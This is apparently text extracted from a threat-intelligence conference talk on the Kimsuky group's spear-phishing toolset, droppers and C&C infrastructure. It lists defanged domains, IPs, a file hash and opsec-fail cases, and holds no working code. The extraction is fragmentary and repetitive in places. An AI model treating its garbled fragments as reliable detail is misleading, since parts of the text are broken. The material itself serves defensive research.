 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### p

##### § Between Toolsets and C&C server

###### § Compromised website in South Korea

 § Cooperation with the police and investigation agency

 § Respond about C&C server


-----

### p

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

### p

##### § Between Toolsets and C&C server


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### p

##### § Between Toolsets and C&C server


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### p

##### § Between Toolsets and C&C server


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### p

##### § Between Toolsets and C&C server

###### § Some of the results of analyzing

 § gyjmc[.]com (KR) → member-authorize[.]com (HOSTINGER)

 → ddlovke[.]kr (KR) → military[.]co.kr (KR) ← suppcrt-seourity[.]esy.es

 (HOSTINGER)

 Full ver. : http://bit.ly/ VB2019_Kimsuky_ M lt


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

##### § [CASE 3] File Download vulnerability

 § Directory Listing (OPSEC FAIL – CASE #01)

###### § /security/downloads


-----

##### § [CASE 3] File Download vulnerability

 § Directory Listing (OPSEC FAIL – CASE #01)


###### § /security/downloads


-----

##### § [CASE 3] File Download vulnerability

 § Directory Listing : New Malware

###### § F:\PC_Manager\Utopia_v0.1\bin

 \AppleSeed.pdb


-----

##### § [CASE 1-1] Directory Listing – HWP Malware

###### § HanyangUpload_script.dll – GetName (2018.07.13)

 § 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)


-----

##### § [CASE 1-1] Directory Listing – HWP Malware


##### [CASE 1-1] Directory Listing – HWP Malware

###### § Another Logs (2019.07.) => NUCLEAR

 § 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)


-----

##### § Related Threat Groups

|§ Rela|ated Threat Group|ps|Col4|Col5|
|---|---|---|---|---|
|Threat Group|Target|Purpose|Activity Time|Major Incident|
|Kimsuky|Infrastructure, Government, North Korean defectors and politicians|Information gathering and social confusion|2013 ~|KHNP cyber terrorism (2014)|


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

##### § Incidents Response in advance

###### § Geopolitical location in South Korea

 § Tracking&Monitoring + @

 § REMEMBER - Obtained various information through like

 OPSEC FAIL CASES

 § Share Information

 § Cooperate with Relevant agency for Response


-----

### Q


# Thank you :)

###### Special Thanks: Seongsu Park(@unpacker) @GReAT
 amur84 @National Police Agency

 hypen1117

 E – mail : jack2@fsec.or.kr
 Twitter @2runjack2


-----